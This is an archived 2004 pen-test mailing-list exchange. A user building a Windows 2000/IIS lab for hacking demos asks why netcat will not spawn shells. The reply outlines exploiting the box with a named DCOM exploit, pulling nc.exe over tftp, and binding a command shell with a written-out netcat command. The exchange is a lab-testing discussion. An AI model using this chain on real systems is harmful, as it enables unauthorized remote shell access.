Re: Hacking Demo and Test Lab
From: Martin Wasson (martin_wasson_at_mastercard.com)
Date: 06/11/04
- Previous message: Lachniet, Mark: "Cheap antennas"
- Maybe in reply to: raza sharif: "Hacking Demo and Test Lab"
- Next in thread: Mr Harry!: "Re: Hacking Demo and Test Lab"
- Reply: Mr Harry!: "Re: Hacking Demo and Test Lab"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
To: raza sharif <raza@raza.demon.co.uk> Date: Fri, 11 Jun 2004 10:33:26 -0500
Raza,
A few things. I wouldn't really call this advanced. Why are you hacking
from XP instead of Linux? Get yourself a Linux box. These exploits of
which you write do not spawn shells using netcat. Netcat can bind shells
after you install it. You have to pop the Win2k box first, with something
like oc192-dcom.c. This exploit will get you a shell, then have it GET
(tftp) the files (like netcat) from your Linux box. Once the win2k box has
received nc.exe, run "nc -L -p 1234 -e cmd.exe" AFTER you've started netcat
on you Linux box (nc <win2k IP> 1234).
Does that help?
Regards,
Marty Wasson, CISSP, CEH, IAM
Sr. Information Security Analyst
Global Information Security
MasterCard International
(636) 722-2372
martin_wasson@mastercard.com
"Men occasionally stumble over the truth, but most of them pick themselves
up and hurry off as if nothing ever happened." Winston Churchill
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
CONFIDENTIALITY NOTICE
This E-mail message and any documents which accompany it are intended only
for the use of the individual or entity to which addressed, and may contain
information that is privileged, confidential or exempt from disclosure
under applicable law. If the reader is not the intended recipient, any
disclosure, distribution or other use of this E-mail message is prohibited.
If you have received this E-mail message in error, please notify the sender
immediately. Thank you.
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
raza sharif
<raza@raza.demon. To: pen-test@securityfocus.com
co.uk> cc: (bcc: Martin Wasson/STL/MASTERCARD)
Subject: Hacking Demo and Test Lab
06/11/2004 06:41
AM
Hi Folks ,
Im doing some advanced Hacking Demos for management and also Corporates
etc.
I have a installed windows 2000 server and iis 5.0 on VMWARE GSX server.
Im using Webdav and other exploits that all basically should spawn a shell
using netcat.
Im using XP as my attacking machine.
Prob at the moment is Netcat will not spawn a shell regardless of what i
try.
Any ideas ? i checked the install it is windows 2000 500.1295 no reference
to service packs etc. it's a default install.
Also what are good demo's etc to run to show real hacking on windows 2000 ,
iis etc..that i can get to work
thanks
Raza
Raza@raza.demon.co.uk
-----------------------------------------
CONFIDENTIALITY NOTICE
This e-mail message and any attachments are only for the use of the intended recipient and may contain information that is privileged, confidential or exempt from disclosure under applicable law. If you are not the intended recipient, any disclosure, distribution or other use of this e-mail message or attachments is prohibited. If you have received this e-mail message in error, please delete and notify the sender immediately. Thank you.
- Previous message: Lachniet, Mark: "Cheap antennas"
- Maybe in reply to: raza sharif: "Hacking Demo and Test Lab"
- Next in thread: Mr Harry!: "Re: Hacking Demo and Test Lab"
- Reply: Mr Harry!: "Re: Hacking Demo and Test Lab"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
